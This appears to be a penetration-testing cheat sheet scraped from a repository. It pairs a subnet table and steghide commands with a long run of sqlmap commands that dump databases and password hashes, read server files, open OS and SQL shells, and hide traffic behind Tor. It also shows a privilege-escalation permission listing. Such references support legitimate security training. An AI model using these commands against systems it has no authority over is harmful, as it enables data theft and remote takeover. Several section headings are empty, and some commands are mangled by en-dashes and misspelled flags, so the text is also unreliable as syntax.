Home

Awesome

The Security Handbook

This repo is based on the original works by frizb, see Credits.md for further information.

NOTE: This document reffers to the target ip as the export variable $ip. To set this value on the command line use the following syntax: export ip=192.168.1.100

Table of Contents

Kali Linux

Information Gathering & Vulnerability Scanning

<!-- -->

Subnet Reference Table

/AddressesHostsNetmaskAmount of a Class C
/3042255.255.255.2521/64
/2986255.255.255.2481/32
/281614255.255.255.2401/16
/273230255.255.255.2241/8
/266462255.255.255.1921/4
/25128126255.255.255.1281/2
/24256254255.255.255.01
/23512510255.255.254.02
/2210241022255.255.252.04
/2120482046255.255.248.08
/2040964094255.255.240.016
/1981928190255.255.224.032
/181638416382255.255.192.064
/173276832766255.255.128.0128
/166553665534255.255.0.0256
<!-- -->

apt-get install steghide

steghide extract -sf picture.jpg

steghide info picture.jpg

apt-get install stegosuite

Buffer Overflows and Exploits

Shells

File Transfers

Privilege Escalation

scsiaccess.exe
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
Everyone:(I)(F)

Client, Web and Password Attacks

Crawl the links
sqlmap -u http://$ip --crawl=1
sqlmap -u http://meh.com --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3
SQLMap Search for databases against a suspected GET SQL Injection point ‘search’
sqlmap –u http://$ip/blog/index.php?search –dbs

SQLMap dump tables from database oscommerce at GET SQL injection point ‘search’
sqlmap –u http://$ip/blog/index.php?search= –dbs –D oscommerce –tables –dumps
SQLMap GET Parameter command
sqlmap -u http://$ip/comment.php?id=738 --dbms=mysql --dump -threads=5
SQLMap Post Username parameter
sqlmap -u http://$ip/login.php --method=POST --data="usermail=asc@dsd.com&password=1231" -p "usermail" --risk=3 --level=5 --dbms=MySQL --dump-all
SQL Map OS Shell
sqlmap -u http://$ip/comment.php?id=738 --dbms=mysql --osshell
sqlmap -u http://$ip/login.php --method=POST --data="usermail=asc@dsd.com&password=1231" -p "usermail" --risk=3 --level=5 --dbms=MySQL --os-shell
Automated sqlmap scan
sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE
--level=3 --current-user --current-db --passwords
--file-read="/var/www/blah.php"
Targeted sqlmap scan
sqlmap -u "http://meh.com/meh.php?id=1"
--dbms=mysql --tech=U --random-agent --dump
**Scan url for union + error based injection with mysql backend
and use a random user agent + database dump
**sqlmap -o -u http://$ip/index.php --forms --dbs
sqlmap -o -u "http://$ip/form/" --forms
sqlmap check form for injection
sqlmap -o -u "http://$ip/vuln-form" --forms
-D database-name -T users --dump
sqlmap dump and crack hashes for table users on database-name.

Enumerate databases
sqlmap --dbms=mysql -u "$URL" --dbs
Enumerate tables from a specific database
sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --tables
Dump table data from a specific database and table
sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" -T "$TABLE" --dump
Specify parameter to exploit
sqlmap --dbms=mysql -u "http://www.example.com/param1=value1&param2=value2" --dbs -p param2
Specify parameter to exploit in 'nice' URIs
sqlmap --dbms=mysql -u "http://www.example.com/param1/value1\*/param2/value2" --dbs # exploits param1
Get OS shell
sqlmap --dbms=mysql -u "$URL" --os-shell
Get SQL shell
sqlmap --dbms=mysql -u "$URL" --sql-shell
SQL query
sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --sql-query "SELECT * FROM $TABLE;"
Use Tor Socks5 proxy
sqlmap --tor --tor-type=SOCKS5 --check-tor --dbms=mysql -u "$URL" --dbs

<span id="_6nmbgmpltwon" class="anchor"><span id="_Toc480741823" class="anchor"></span></span>Networking, Pivoting and Tunneling

<span id="_ujpvtdpc9i67" class="anchor"><span id="_Toc480741824" class="anchor"></span></span>The Metasploit Framework

<span id="_51btodqc88s2" class="anchor"><span id="_Toc480741825" class="anchor"></span></span>Bypassing Antivirus Software